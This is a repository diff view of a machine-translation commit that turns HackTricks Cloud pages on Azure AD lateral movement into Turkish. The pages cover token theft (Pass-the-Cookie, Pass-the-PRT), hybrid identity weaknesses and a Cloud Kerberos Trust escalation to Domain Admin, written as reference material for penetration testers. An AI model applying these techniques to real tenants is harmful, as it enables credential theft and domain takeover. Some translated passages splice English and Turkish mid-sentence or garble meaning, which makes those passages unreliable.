gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-06 12:51:19 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:00:13 +00:00
parent 7770a50092
commit 15cffea561
244 changed files with 8748 additions and 11587 deletions
Download Patch File Download Diff File Expand all files Collapse all files

13
.github/pull_request_template.md vendored
View File

@@ -1,16 +1,11 @@
You can remove this content before sending the PR:
## Attribution
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
Bilginize değer veriyoruz ve içeriği paylaşmanızı teşvik ediyoruz. Lütfen yalnızca sahip olduğunuz veya orijinal yazardan paylaşma izni aldığınız içeriği yüklediğinizden emin olun (eklenen metinde veya değiştirdiğiniz sayfanın sonunda yazara bir referans ekleyerek veya her ikisini yaparak). Fikri mülkiyet haklarına saygınız, herkes için güvenilir ve yasal bir paylaşım ortamını teşvik eder.
## HackTricks Training
If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.
Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.
In any case, thanks for contributing to HackTricks!
Eğer [ARTE sertifikası](https://training.hacktricks.xyz/courses/arte) sınavını 3 yerine 2 bayrakla geçmek için ekleme yapıyorsanız, PR'yi `arte-<username>` olarak adlandırmalısınız.
Ayrıca, dil/gramer düzeltmelerinin sınav bayrak azaltımı için kabul edilmeyeceğini unutmayın.
Her durumda, HackTricks'e katkıda bulunduğunuz için teşekkürler!

52
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
View File

@@ -4,66 +4,62 @@
{{#include ../../../banners/hacktricks-training.md}}
### On-Prem machines connected to cloud
### Bulut ile bağlantılı On-Prem makineleri
There are different ways a machine can be connected to the cloud:
Bir makinenin buluta bağlanmasının farklı yolları vardır:
#### Azure AD joined
#### Azure AD katıldı
<figure><img src="../../../images/image (259).png" alt=""><figcaption></figcaption></figure>
#### Workplace joined
#### Workplace katıldı
<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large</a></p></figcaption></figure>
#### Hybrid joined
#### Hibrit katıldı
<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large</a></p></figcaption></figure>
#### Workplace joined on AADJ or Hybrid
#### AADJ veya Hibrit üzerinde Workplace katıldı
<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large</a></p></figcaption></figure>
### Tokens and limitations <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
### Tokenler ve sınırlamalar <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
In Azure AD, there are different types of tokens with specific limitations:
Azure AD'de, belirli sınırlamaları olan farklı türde tokenler vardır:
- **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource.
- **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications.
- **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device.
- **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens.
- **Erişim tokenleri**: Microsoft Graph gibi API'lere ve kaynaklara erişmek için kullanılır. Belirli bir istemci ve kaynakla ilişkilidir.
- **Yenileme tokenleri**: Yeni erişim tokenleri almak için uygulamalara verilir. Sadece verildiği uygulama veya bir grup uygulama tarafından kullanılabilir.
- **Birincil Yenileme Tokenleri (PRT)**: Azure AD katılı, kayıtlı veya hibrit katılı cihazlarda Tek Oturum Açma için kullanılır. Tarayıcı oturum açma akışlarında ve cihazdaki mobil ve masaüstü uygulamalara giriş yapmak için kullanılabilir.
- **Windows Hello for Business anahtarları (WHFB)**: Şifresiz kimlik doğrulama için kullanılır. Birincil Yenileme Tokenlerini almak için kullanılır.
The most interesting type of token is the Primary Refresh Token (PRT).
En ilginç token türü Birincil Yenileme Tokeni (PRT) dir.
{{#ref}}
az-primary-refresh-token-prt.md
{{#endref}}
### Pivoting Techniques
### Pivoting Teknikleri
From the **compromised machine to the cloud**:
**tehdit altındaki makineden buluta**:
- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
- [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
- [**Cookie'yi Geç**](az-pass-the-cookie.md): Tarayıcıdan Azure çerezlerini çal ve giriş yapmak için kullan
- [**Süreçlerin erişim tokenlerini dök**](az-processes-memory-access-token.md): Bulut ile senkronize edilmiş yerel süreçlerin belleğini dök (örneğin excel, Teams...) ve açık metin olarak erişim tokenlerini bul.
- [**Birincil Yenileme Tokenini Phishing**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** PRT'yi phishing yaparak kötüye kullan
- [**PRT'yi Geç**](pass-the-prt.md): Azure'a erişmek için cihaz PRT'sini çal.
- [**Sertifikayı Geç**](az-pass-the-certificate.md)**:** Bir makineden diğerine giriş yapmak için PRT'ye dayalı bir sertifika oluştur
From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**:
**AD'yi tehlikeye atmaktan bulutu tehlikeye atmaktan ve bulutu tehlikeye atmaktan AD'yi tehlikeye atmaktan**:
- [**Azure AD Connect**](azure-ad-connect-hybrid-identity/)
- **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md)
- **Buluttan On-Prem'e geçmenin bir diğer yolu** [**Intune'u kötüye kullanmaktır**](../az-services/intune.md)
#### [Roadtx](https://github.com/dirkjanm/ROADtools)
This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
Bu araç, Azure AD'de bir makine kaydetmek için PRT almak ve PRT'leri (meşru veya çalıntı) çeşitli yollarla kaynaklara erişmek için kullanmak gibi birkaç işlem gerçekleştirmeyi sağlar. Bunlar doğrudan saldırılar değildir, ancak PRT'leri farklı yollarla kaynaklara erişmek için kullanmayı kolaylaştırır. Daha fazla bilgi için [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
## References
## Referanslar
- [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
{{#include ../../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
View File

@@ -2,63 +2,57 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
**On-premises Active Directory (AD)** ve **Azure AD** arasındaki entegrasyon, **Azure AD Connect** tarafından sağlanmakta olup, **Single Sign-on (SSO)**'yu destekleyen çeşitli yöntemler sunmaktadır. Her yöntem, faydalı olmasına rağmen, bulut veya yerel ortamları tehlikeye atabilecek potansiyel güvenlik açıkları içermektedir:
- **Pass-Through Authentication (PTA)**:
- Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
- Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
- Yerel AD'deki ajanının tehlikeye atılması, Azure bağlantıları için kullanıcı şifrelerinin doğrulanmasına olanak tanır (yerel'den Bulut'a).
- Yeni bir konumda kimlik doğrulamalarını doğrulamak için yeni bir ajanın kaydedilmesi olasılığı (Bulut'tan yerel'e).
{{#ref}}
pta-pass-through-authentication.md
{{#endref}}
- **Password Hash Sync (PHS)**:
- Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
- AD'den ayrı metin şifrelerin, yüksek ayrıcalıklı, otomatik olarak oluşturulmuş AzureAD kullanıcısının kimlik bilgileri de dahil olmak üzere, ayrıcalıklı kullanıcıların çıkarılması olasılığı.
{{#ref}}
phs-password-hash-sync.md
{{#endref}}
- **Federation**:
- Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
- SAML imzalama için kullanılan özel anahtarın çalınması, yerel ve bulut kimliklerinin taklit edilmesine olanak tanır.
{{#ref}}
federation.md
{{#endref}}
- **Seamless SSO:**
- Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
- Kerberos gümüş biletlerini imzalamak için kullanılan `AZUREADSSOACC` kullanıcısının şifresinin çalınması, herhangi bir bulut kullanıcısının taklit edilmesine olanak tanır.
{{#ref}}
seamless-sso.md
{{#endref}}
- **Cloud Kerberos Trust**:
- Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
- AzureAD kullanıcı adları ve SID'leri manipüle edilerek Global Admin'den yerel Domain Admin'e yükselme olasılığı ve AzureAD'den TGT talep etme.
{{#ref}}
az-cloud-kerberos-trust.md
{{#endref}}
- **Default Applications**:
- Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
- Bir Uygulama Yöneticisi hesabının veya yerel Senkronizasyon Hesabının tehlikeye atılması, dizin ayarlarının, grup üyeliklerinin, kullanıcı hesaplarının, SharePoint sitelerinin ve OneDrive dosyalarının değiştirilmesine olanak tanır.
{{#ref}}
az-default-applications.md
{{#endref}}
For each integration method, user synchronization is conducted, and an `MSOL_<installationidentifier>` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
Her entegrasyon yöntemi için, kullanıcı senkronizasyonu gerçekleştirilir ve yerel AD'de bir `MSOL_<installationidentifier>` hesabı oluşturulur. Özellikle, hem **PHS** hem de **PTA** yöntemleri **Seamless SSO**'yu kolaylaştırarak, yerel alan adına katılan Azure AD bilgisayarları için otomatik oturum açma sağlar.
**Azure AD Connect**'in kurulumunu doğrulamak için, **AzureADConnectHealthSync** modülünü (varsayılan olarak Azure AD Connect ile birlikte yüklenir) kullanarak aşağıdaki PowerShell komutu kullanılabilir:
```powershell
Get-ADSyncConnector
```
{{#include ../../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
View File

@@ -2,52 +2,48 @@
{{#include ../../../../banners/hacktricks-training.md}}
**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
**Bu gönderi,** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **adresinde bulunan saldırı hakkında daha fazla bilgi için kontrol edilebilecek bir özetidir. Bu teknik ayrıca** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)** adresinde de yorumlanmıştır.**
## Basic Information
## Temel Bilgiler
### Trust
### Güven
When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC) is created in the AD.** The **RODC computer account**, named **`AzureADKerberos$`**. Also, a secondary `krbtgt` account named **`krbtgt_AzureAD`**. This account contains the **Kerberos keys** used for tickets that Azure AD creates.
Azure AD ile bir güven kurulduğunda, **AD'de bir Okuma Yalnızca Alan Denetleyicisi (RODC) oluşturulur.** **RODC bilgisayar hesabı**, **`AzureADKerberos$`** olarak adlandırılır. Ayrıca, **`krbtgt_AzureAD`** adında bir ikincil `krbtgt` hesabı da oluşturulur. Bu hesap, Azure AD'nin oluşturduğu biletler için kullanılan **Kerberos anahtarlarını** içerir.
Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators...
Bu nedenle, bu hesap ele geçirilirse, herhangi bir kullanıcıyı taklit etmek mümkün olabilir... ancak bu doğru değildir çünkü bu hesap, Alan Yöneticileri, Kurumsal Yöneticiler, Yöneticiler gibi herhangi bir yaygın ayrıcalıklı AD grubuna bilet oluşturma yetkisine sahip değildir...
> [!CAUTION]
> However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
> Ancak, gerçek bir senaryoda bu gruplarda yer almayan ayrıcalıklı kullanıcılar olacaktır. Bu nedenle, **yeni krbtgt hesabı, ele geçirilirse, onları taklit etmek için kullanılabilir.**
### Kerberos TGT
Moreover, when a user authenticates on Windows using a hybrid identity **Azure AD** will issue **partial Kerberos ticket along with the PRT.** The TGT is partial because **AzureAD has limited information** of the user in the on-prem AD (like the security identifier (SID) and the name).\
Windows can then **exchange this partial TGT for a full TGT** by requesting a service ticket for the `krbtgt` service.
Ayrıca, bir kullanıcı Windows'ta hibrit kimlik kullanarak kimlik doğruladığında, **Azure AD, PRT ile birlikte kısmi Kerberos bileti verir.** TGT kısmi olarak adlandırılır çünkü **AzureAD'nin on-prem AD'deki kullanıcı hakkında sınırlı bilgisi** vardır (güvenlik tanımlayıcısı (SID) ve isim gibi).\
Windows, ardından **bu kısmi TGT'yi tam TGT ile değiştirebilir** ve `krbtgt` hizmeti için bir hizmet bileti talep edebilir.
### NTLM
As there could be services that doesn't support kerberos authentication but NTLM, it's possible to request a **partial TGT signed using a secondary `krbtgt`** key including the **`KERB-KEY-LIST-REQ`** field in the **PADATA** part of the request and then get a full TGT signed with the primary `krbtgt` key **including the NT hash in the response**.
Kerberos kimlik doğrulamasını desteklemeyen ancak NTLM'yi destekleyen hizmetler olabileceğinden, **`KERB-KEY-LIST-REQ`** alanını **PADATA** talebinin parçasına ekleyerek **ikincil `krbtgt`** anahtarı ile imzalanmış bir kısmi TGT talep etmek ve ardından birincil `krbtgt` anahtarı ile imzalanmış tam bir TGT almak mümkündür **NT hash yanıtında** dahil edilmiştir.
## Abusing Cloud Kerberos Trust to obtain Domain Admin <a href="#abusing-cloud-kerberos-trust-to-obtain-domain-admin" id="abusing-cloud-kerberos-trust-to-obtain-domain-admin"></a>
## Alan Yöneticisi Elde Etmek İçin Cloud Kerberos Trust'ı Kötüye Kullanma <a href="#abusing-cloud-kerberos-trust-to-obtain-domain-admin" id="abusing-cloud-kerberos-trust-to-obtain-domain-admin"></a>
When AzureAD generates a **partial TGT** it will be using the details it has about the user. Therefore, if a Global Admin could modify data like the **security identifier and name of the user in AzureAD**, when requesting a TGT for that user the **security identifier would be a different one**.
AzureAD bir **kısmi TGT** oluşturduğunda, kullanıcı hakkında sahip olduğu ayrıntıları kullanacaktır. Bu nedenle, bir Global Admin, **AzureAD'deki kullanıcının güvenlik tanımlayıcısını ve adını** değiştirebilirse, o kullanıcı için bir TGT talep ettiğinde **güvenlik tanımlayıcısı farklı olacaktır**.
It's not possible to do that through the Microsoft Graph or the Azure AD Graph, but it's possible to use the **API Active Directory Connect** uses to create and update synced users, which can be used by the Global Admins to **modify the SAM name and SID of any hybrid user**, and then if we authenticate, we get a partial TGT containing the modified SID.
Bunu Microsoft Graph veya Azure AD Graph aracılığıyla yapmak mümkün değildir, ancak Global Admin'lerin **senkronize kullanıcıları oluşturmak ve güncellemek için kullandığı API'yi** kullanmak mümkündür; bu, Global Admin'lerin **herhangi bir hibrit kullanıcının SAM adını ve SID'sini değiştirmesine** olanak tanır ve ardından kimlik doğruladığımızda, değiştirilmiş SID'yi içeren bir kısmi TGT alırız.
Note that we can do this with AADInternals and update to synced users via the [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet.
Bunu AADInternals ile yapabileceğimizi ve senkronize kullanıcılara [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet'i aracılığıyla güncelleyebileceğimizi unutmayın.
### Attack prerequisites <a href="#attack-prerequisites" id="attack-prerequisites"></a>
### Saldırı Ön Koşulları <a href="#attack-prerequisites" id="attack-prerequisites"></a>
The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites:
Saldırının başarısı ve Alan Yöneticisi ayrıcalıklarının elde edilmesi, belirli ön koşulların karşılanmasına bağlıdır:
- The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts.
- Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication.
- Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket.
- Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC.
- The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object.
- Hesapları Senkronizasyon API'si aracılığıyla değiştirme yeteneği kritik öneme sahiptir. Bu, Global Admin rolüne sahip olmak veya bir AD Connect senkronizasyon hesabına sahip olmakla sağlanabilir. Alternatif olarak, Hibrit Kimlik Yöneticisi rolü yeterlidir, çünkü AD Connect'i yönetme ve yeni senkronizasyon hesapları oluşturma yetkisi verir.
- **Hibrit bir hesabın** varlığı gereklidir. Bu hesap, kurban hesabının ayrıntılarıyla değiştirilmek üzere uygun olmalı ve kimlik doğrulama için de erişilebilir olmalıdır.
- Active Directory içinde bir **hedef kurban hesabının** tanımlanması gereklidir. Saldırı, zaten senkronize edilmiş herhangi bir hesap üzerinde gerçekleştirilebilir, ancak Azure AD kiracısının on-prem güvenlik tanımlayıcılarını çoğaltmamış olması gerekir; bu nedenle, bileti elde etmek için senkronize edilmemiş bir hesabın değiştirilmesi gerekmektedir.
- Ayrıca, bu hesabın alan yöneticisi eşdeğer ayrıcalıklara sahip olması gerekir, ancak AzureAD RODC tarafından geçersiz TGT'lerin üretilmesini önlemek için tipik AD yönetici gruplarının bir üyesi olmamalıdır.
- En uygun hedef, **AD Connect Senkronizasyon hizmeti tarafından kullanılan Active Directory hesabıdır.** Bu hesap Azure AD ile senkronize edilmez, bu da SID'sinin geçerli bir hedef olmasını sağlar ve şifre karmaşalarını senkronize etme rolü nedeniyle doğası gereği Alan Yöneticisi eşdeğer ayrıcalıklara sahiptir (Şifre Karma Senkronizasyonu aktif varsayılarak). Hızlı kurulum olan alanlar için bu hesap **MSOL\_** ile başlar. Diğer durumlarda, hesap, alan nesnesi üzerindeki Dizin Çoğaltma ayrıcalıklarına sahip tüm hesapları listeleyerek belirlenebilir.
### The full attack <a href="#the-full-attack" id="the-full-attack"></a>
### Tam Saldırı <a href="#the-full-attack" id="the-full-attack"></a>
Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/)
Bunu orijinal gönderide kontrol edin: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/)
{{#include ../../../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
View File

@@ -2,12 +2,8 @@
{{#include ../../../../banners/hacktricks-training.md}}
**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
**Tekniği kontrol edin:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) ve [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post.
Blog yazısı, Azure AD'deki bir ayrıcalık yükseltme açığını tartışıyor; bu, Uygulama Yöneticileri veya ele geçirilmiş On-Premise Senkronizasyon Hesaplarının uygulamalara kimlik bilgileri atayarak ayrıcalıkları yükseltmesine olanak tanıyor. Açık, Azure AD'nin uygulamaları ve hizmet ilkelerini "tasarım gereği" ele alma davranışından kaynaklanıyor ve özellikle varsayılan Office 365 uygulamalarını etkiliyor. Bildirilmiş olmasına rağmen, Microsoft bu durumu, yönetici hakları atama davranışının belgelenmesi nedeniyle bir açık olarak görmüyor. Yazı, teknik içgörüler sunmakta ve Azure AD ortamlarında hizmet ilkesi kimlik bilgilerini düzenli olarak gözden geçirme önerisinde bulunmaktadır. Daha ayrıntılı bilgi için, orijinal blog yazısını ziyaret edebilirsiniz.
{{#include ../../../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
View File

@@ -1,36 +1,30 @@
# Az- Synchronising New Users
# Az- Yeni Kullanıcıları Senkronize Etme
{{#include ../../../../banners/hacktricks-training.md}}
## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD
## AzureAD kullanıcılarını on-prem'e senkronize ederek on-prem'den AzureAD'ye yükseltme
I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements:
- The **AzureAD user** needs to have a proxy address (a **mailbox**)
- License is not required
- Should **not be already synced**
AzureAD'den on-prem AD'ye yeni bir kullanıcıyı senkronize etmek için gereksinimler şunlardır:
- **AzureAD kullanıcısı** bir proxy adresine (bir **posta kutusu**) sahip olmalıdır
- Lisans gerekli değildir
- **Zaten senkronize olmamalıdır**
```powershell
Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl
```
When a user like these is found in AzureAD, in order to **on-prem AD'den erişmek için** you just need to **yeni bir hesap oluşturmak** with the **proxyAddress** the SMTP email.
When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email.
An automatically, this user will be **synced from AzureAD to the on-prem AD user**.
An automatically, this user will be **AzureAD'den on-prem AD kullanıcısına senkronize edilecektir**.
> [!CAUTION]
> Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**.
> Notice that to perform this attack you **Domain Admin'e ihtiyaç duymuyorsunuz**, you just need permissions to **yeni kullanıcılar oluşturmak**.
>
> Also, this **won't bypass MFA**.
> Also, this **MFA'yı atlatmayacak**.
>
> Moreover, this was reported an **account sync is no longer possible for admin accounts**.
> Moreover, this was reported an **admin hesapları için senkronizasyon artık mümkün değil**.
## References
- [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg)
{{#include ../../../../banners/hacktricks-training.md}}

112
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md
View File

@@ -2,34 +2,34 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federation** is a collection of **domains** that have established **trust**. The level of trust may vary, but typically includes **authentication** and almost always includes **authorization**. A typical federation might include a **number of organizations** that have established **trust** for **shared access** to a set of resources.
[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federation** güvenin tesis edildiği **alanlar** topluluğudur. Güven düzeyi değişiklik gösterebilir, ancak genellikle **kimlik doğrulama** içerir ve neredeyse her zaman **yetkilendirme** içerir. Tipik bir federasyon, belirli bir kaynak setine **paylaşılan erişim** için **güven** tesis etmiş **bir dizi organizasyon** içerebilir.
You can **federate your on-premises** environment **with Azure AD** and use this federation for authentication and authorization. This sign-in method ensures that all user **authentication occurs on-premises**. This method allows administrators to implement more rigorous levels of access control. Federation with **AD FS** and PingFederate is available.
**Yerel** ortamınızı **Azure AD** ile **federate** edebilir ve bu federasyonu kimlik doğrulama ve yetkilendirme için kullanabilirsiniz. Bu oturum açma yöntemi, tüm kullanıcı **kimlik doğrulamasının yerel ortamda gerçekleşmesini** sağlar. Bu yöntem, yöneticilerin daha katı erişim kontrol seviyeleri uygulamasına olanak tanır. **AD FS** ve PingFederate ile federasyon mevcuttur.
<figure><img src="../../../../images/image (154).png" alt=""><figcaption></figcaption></figure>
Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**.
Temelde, Federasyonda tüm **kimlik doğrulama** **yerel** ortamda gerçekleşir ve kullanıcı, tüm güvenilir ortamlar arasında SSO deneyimler. Bu nedenle, kullanıcılar **yerel kimlik bilgilerini** kullanarak **bulut** uygulamalarına **erişim** sağlayabilirler.
**Security Assertion Markup Language (SAML)** is used for **exchanging** all the authentication and authorization **information** between the providers.
**Güvenlik İddası İşaretleme Dili (SAML)**, sağlayıcılar arasında tüm kimlik doğrulama ve yetkilendirme **bilgilerini** **değiştirmek** için kullanılır.
In any federation setup there are three parties:
Her federasyon kurulumunda üç taraf vardır:
- User or Client
- Identity Provider (IdP)
- Service Provider (SP)
- Kullanıcı veya İstemci
- Kimlik Sağlayıcı (IdP)
- Hizmet Sağlayıcı (SP)
(Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
(Görseller https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps adresinden alınmıştır)
<figure><img src="../../../../images/image (121).png" alt=""><figcaption></figcaption></figure>
1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation.
2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP.
3. The IdP takes over, authenticating the user. Post-authentication, a SAMLResponse is formulated by the IdP and forwarded to the SP through the user.
4. Finally, the SP evaluates the SAMLResponse. If validated successfully, implying a trust relationship with the IdP, the user is granted access. This marks the completion of the login process, allowing the user to utilize the service.
1. İlk olarak, bir uygulama (Hizmet Sağlayıcı veya SP, örneğin AWS konsolu veya vSphere web istemcisi) bir kullanıcı tarafından erişilir. Bu adım atlanabilir ve istemci doğrudan IdP'ye (Kimlik Sağlayıcı) yönlendirilebilir.
2. Sonrasında, SP, kullanıcı kimlik doğrulaması için uygun IdP'yi (örneğin, AD FS, Okta) belirler. Ardından, bir SAML (Güvenlik İddası İşaretleme Dili) AuthnRequest oluşturur ve istemciyi seçilen IdP'ye yönlendirir.
3. IdP devralır, kullanıcıyı kimlik doğrular. Kimlik doğrulama sonrası, IdP tarafından bir SAMLResponse oluşturulur ve kullanıcı aracılığıyla SP'ye iletilir.
